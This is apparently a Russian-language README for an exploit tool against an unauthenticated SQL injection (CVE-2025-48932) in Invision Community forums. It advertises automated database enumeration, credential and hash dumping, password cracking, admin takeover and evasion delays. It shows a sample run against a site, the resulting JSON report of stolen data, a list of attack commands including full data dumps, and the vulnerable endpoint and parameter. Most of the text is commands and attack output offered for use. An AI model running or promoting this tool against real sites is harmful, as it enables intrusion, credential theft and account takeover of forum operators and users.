
CVE-2025-48932 — Эксплойт неаутентифицированной SQL-инъекции для Invision Community ≤ 4.7.20. Полностью автоматизированная эксплуатация с перечислением базы данных, дампом учётных данных, захватом администратора, перехватом сессий и многопоточностью. Не требует зависимостей. Инструмент для исследований в области безопасности от Sudeepa Wanigarathna.
CVE-2025-48932 — это критическая неаутентифицированная слепая SQL-инъекция, обнаруженная в Invision Community версиях ≤ 4.7.20. Этот эксплойт позволяет удалённым злоумышленникам:
| Возможность | Описание | Статус |
|---|---|---|
| 🚀 Ноль зависимостей | Чистая стандартная библиотека Python — не требуется pip install | ✅ |
| ⚡ Многопоточность | Молниеносное извлечение данных с настраиваемым количеством потоков | ✅ |
| 🤖 Полная автоматизация | Полная цепочка эксплуатации: от обнаружения до формирования отчёта | ✅ |
| 👑 Захват администратора | Перехват сессий и повышение привилегий | ✅ |
| 🔑 Извлечение учётных данных | Извлечение пользователей, хэшей паролей, email-адресов | ✅ |
| 🔓 Взлом паролей | Встроенный подбор хэшей с поддержкой словарей | ✅ |
| 📋 Отчёты в JSON | Структурированный вывод для анализа и документации | ✅ |
| 🔌 Поддержка прокси | Интеграция с Burp Suite и пользовательскими прокси | ✅ |
| 🎨 Цветной вывод | Красивое оформление вывода в терминале с индикаторами прогресса | ✅ |
| 🛡️ Ограничение скорости | Встроенные задержки для предотвращения обнаружения | ✅ |
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# Клонируйте репозиторий
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# Устанавливать зависимости не нужно! Просто запустите.
# Проверка, уязвима ли цель
python3 exploit.py -u https://example.com --check-only
# Полная эксплуатация с подробным выводом
python3 exploit.py -u https://example.com -v
# С прокси (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# Сохранение результатов в пользовательский файл
python3 exploit.py -u https://example.com -o results.json
# Многопоточное извлечение (быстрее)
python3 exploit.py -u https://example.com -t 10
# Выгрузка всех доступных данных
python3 exploit.py -u https://example.com --dump-all
# С пользовательским словарём для взлома паролей
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# Тихий режим (без вывода, только отчёт)
python3 exploit.py -u https://example.com -o silent_report.json
# Режим отладки с подробными ошибками
python3 exploit.py -u https://example.com -v --debug
✅ Без внешних зависимостей!
✅ Только чистая стандартная библиотека Python!
✅ Не нужны pip install или виртуальное окружение!
# Загрузите популярный словарь
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location (ввод, предоставленный пользователем)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]